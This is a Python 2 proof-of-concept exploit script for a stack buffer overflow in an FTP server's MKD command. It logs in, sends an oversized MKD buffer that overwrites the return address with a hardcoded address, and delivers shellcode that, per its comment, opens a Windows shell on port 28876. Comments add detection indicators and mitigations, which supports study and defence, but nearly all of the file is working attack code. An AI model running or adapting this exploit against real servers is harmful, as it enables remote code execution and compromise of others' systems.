#!/usr/bin/env python
# cesar_dbg.py
#
# Proof-of-concept for a stack buffer overflow in an FTP server's MKD
# command handler. The script logs in, then sends one MKD request whose
# argument is padded to the point where the saved return address is
# overwritten (see the buffer layout below). Python 2 syntax: `print` is a
# statement and all buffers are byte `str`s; it will not run under Python 3
# without changes.
#
# Defender's view: the observable on the wire is a single MKD command
# roughly 700+ bytes long containing embedded LF characters, a non-ASCII
# address, NOPs and INT 3 bytes before the CRLF. A length check on the MKD
# argument in the server, plus DEP/ASLR (which make a fixed return address
# such as the one below unreliable), are the mitigations.
from socket import *        # star import: brings socket, AF_INET, SOCK_STREAM into scope
import struct
# 4-byte little-endian address that lands in the saved return address slot
# (the "Control EIP" element of the buffer below). The value is specific to
# one particular target build/OS image and is meaningless elsewhere.
eip = struct.pack('<i',0x77D8AF0A)
host = "ip"                 # placeholder; "ip" is not a resolvable address as written
port = 21                   # FTP control channel
user = "ftp"
password = "ftp"            # anonymous-style credentials; the overflow is post-authentication
# Shellcode will open windows shell on port 28876
# (per the author's note; a new listener on TCP/28876 on the server host is
# the host-side indicator that this payload executed)
shellcode = (
"\xd9\xcc\xb8\x84\x3b\xe0\x15\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x36\x31\x42\x19\x03\x42\x19\x83\xc2\x04\x66\xce\xd1\xdc\x02"
"\xba\x63\xef\x41\xca\x8f\x84\x23\x2f\x1b\xf4\xc3\xc4\x65\x29"
"\x58\xec\xa1\x66\x46\x64\x21\x29\x1e\xb4\x9a\xf9\xec\xd0\x42"
"\xa8\x67\x52\xe3\xe3\x08\x9d\x6b\x82\xf0\x2b\x88\xbc\x30\x7a"
"\x43\x37\x2f\xab\xa8\xe2\xee\x05\x0e\xa2\xa7\xf4\x13\xab\x6b"
"\x53\x5c\xbf\x2e\xa7\xe8\xe3\xcd\xaf\xef\xf0\x66\x04\xd0\x07"
"\x91\xcd\x21\xda\x23\x79\x75\x4b\xa2\x93\xc2\x5d\x08\x5f\x5a"
"\x8a\x94\x9c\xed\xbf\xe3\xe7\x2a\x35\xe0\x46\xbe\xfe\xd2\x77"
"\x29\x0f\xad\x6c\xf8\x9b\x9a\x90\xfb\x72\x95\x41\xf8\x80\x34"
"\x3a\x7f\xb6\x3f\x48\x88\x4a\x61\xb6\xdb\xab\x4d\xe1\x4e\xd3"
"\x53\x7d\x04\x65\xf5\x2c\x19\x55\xa4\xd0\x36\xc3\x37\x01\x49"
"\x13\xb8\x6d\xdf\xfc\x91\x3c\x4a\x02\xcd\xba\xb5\x88\x15\xf5"
"\xe7\x23\x8d\x95\x6a\xa0\x6d\xd7\x09\x0c\x55\x4c\x5a\xe7\x63"
"\xd5\x74\xf9\x3f\x5d\xba\xde\xe8\x33\x91\x4c\xd0\xf3\xfa\x79"
"\x8b\xa9\x56\x2d\x61\xb1\x01\x35\x0e\x0b\x52\x5c\xda\x6b\x55"
"\x60")
print "Lenght of shellcode: %d" % (len(shellcode))   # note: message text misspells "Length"
# --- FTP login: banner, USER, PASS; each reply is read once with a 1 KiB recv ---
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
s.send("user %s\r\n" % (user))
print s.recv(1024)
s.send("pass %s\r\n" % (password))
print s.recv(1024)
# --- Buffer layout: 671 x "\n" + "OMG" fill the stack frame up to the saved
# return address; eip overwrites it; 10 NOPs (0x90) and 4 INT 3 (0xCC) sit
# before the payload so a debugger attached to the server stops there
# (hence the "_dbg" in the file name); CRLF terminates the FTP command. ---
buffer = "MKD " # Command
buffer += "\n" * 671 # Required parameter
buffer += "OMG" # 3 bytes alpha char, also required
buffer += eip # Control EIP
buffer += "\x90" * 10
buffer += "\xcc\xcc\xcc\xcc" # INT 3, break / pause the execution
buffer += shellcode # Payload
buffer += "\r\n" # Another required parameter
print "Lenght of buffer: %d" % (len(buffer))   # same typo as above; left as-is (runtime string)
s.send(buffer)
print s.recv(1024)   # one final recv; if the server crashed this may return empty or raise
s.close()